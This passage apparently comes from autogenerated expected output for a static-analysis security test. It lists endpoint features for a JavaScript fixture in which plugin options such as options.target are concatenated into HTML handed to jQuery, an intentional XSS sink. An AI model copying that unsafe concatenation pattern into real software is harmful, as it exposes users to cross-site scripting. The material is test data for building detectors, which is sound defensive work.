    ' | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:38:143:43 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:38:143:43 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:38:143:43 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:38:143:43 | target | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:45:143:50 |
    | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:45:143:50 |
    | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:45:143:50 |
    | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:45:143:50 |
    | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:143:45:143:50 | | stringConcatenatedWith | '
    ' + options.target -endpoint- | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:144:3:144:3 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:144:3:144:3 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:144:3:144:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:144:3:144:3 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:144:3:144:17 | $(intentional2) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:144:3:144:17 | $(intentional2) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:144:3:144:17 | $(intentional2) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:144:3:144:17 | $(intentional2) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:144:3:144:17 | exceptional return of $(intentional2) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:144:3:144:17 | exceptional return of $(intentional2) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:144:3:144:17 | exceptional return of $(intentional2) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:144:3:144:17 | exceptional return of $(intentional2) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:144:5:144:16 | intentional2 | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:144:5:144:16 | intentional2 | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:144:5:144:16 | intentional2 | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:144:5:144:16 | intentional2 | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:144:5:144:16 | intentional2 | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:144:5:144:16 | intentional2 | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:7:146:18 | intentional3 | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:7:146:18 | intentional3 | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:7:146:18 | intentional3 | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:7:146:18 | intentional3 | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:7:146:54 | intenti ...
    ` | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:7:146:54 | intenti ... ` | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:7:146:54 | intenti ... ` | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:7:146:54 | intenti ... ` | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:7:146:54 | intentional3 | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:7:146:54 | intentional3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:7:146:54 | intentional3 | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:7:146:54 | intentional3 | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:22:146:28 | `
    ` | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:22:146:28 | `
    ` | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:22:146:28 | `
    ` | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:22:146:28 | `
    ` | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:22:146:54 | `
    ` ...
    ` | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:22:146:54 | `
    ` ...
    ` | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:22:146:54 | `
    ` ...
    ` | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:22:146:54 | `
    ` ...
    ` | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:23:146:27 |
    | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:23:146:27 |
    | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:23:146:27 |
    | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:23:146:27 |
    | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:23:146:27 |
    | stringConcatenatedWith | -endpoint- ? | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:32:146:38 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:32:146:38 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:32:146:38 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:32:146:38 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:32:146:45 | options.target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:32:146:45 | options.target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:32:146:45 | options.target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:32:146:45 | options.target | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:32:146:54 | options ...
    ` | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:32:146:54 | options ...
    ` | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:32:146:54 | options ...
    ` | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:32:146:54 | options ...
    ` | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:32:146:54 | options ...
    ` | stringConcatenatedWith | '
    ' -endpoint- | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:40:146:45 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:40:146:45 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:40:146:45 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:40:146:45 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:47:146:54 | `
    ` | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:47:146:54 | `
    ` | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:47:146:54 | `
    ` | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:47:146:54 | `
    ` | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:48:146:53 |
    | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:48:146:53 | | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:48:146:53 | | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:146:48:146:53 | | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:147:3:147:3 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:147:3:147:3 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:147:3:147:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:147:3:147:3 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:147:3:147:17 | $(intentional3) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:147:3:147:17 | $(intentional3) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:147:3:147:17 | $(intentional3) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:147:3:147:17 | $(intentional3) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:147:3:147:17 | exceptional return of $(intentional3) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:147:3:147:17 | exceptional return of $(intentional3) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:147:3:147:17 | exceptional return of $(intentional3) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:147:3:147:17 | exceptional return of $(intentional3) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:147:5:147:16 | intentional3 | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:147:5:147:16 | intentional3 | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:147:5:147:16 | intentional3 | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:147:5:147:16 | intentional3 | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:147:5:147:16 | intentional3 | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:147:5:147:16 | intentional3 | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:7:149:19 | unintentional | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:7:149:19 | unintentional | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:7:149:19 | unintentional | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:7:149:19 | unintentional | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:7:149:61 | uninten ... ` | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:7:149:61 | uninten ... ` | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:7:149:61 | uninten ... ` | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:7:149:61 | uninten ... ` | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:7:149:61 | unintentional | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:7:149:61 | unintentional | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:7:149:61 | unintentional | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:7:149:61 | unintentional | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:23:149:61 | `
    ` | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:23:149:61 | `
    ` | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:23:149:61 | `
    ` | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:23:149:61 | `
    ` | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:24:149:35 |
    ' | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:38:149:44 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:38:149:44 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:38:149:44 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:38:149:44 | options | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:38:149:51 | options.target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:38:149:51 | options.target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:38:149:51 | options.target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:38:149:51 | options.target | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:38:149:51 | options.target | stringConcatenatedWith | '
    ' | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:46:149:51 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:46:149:51 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:46:149:51 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:46:149:51 | target | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:53:149:60 | ">
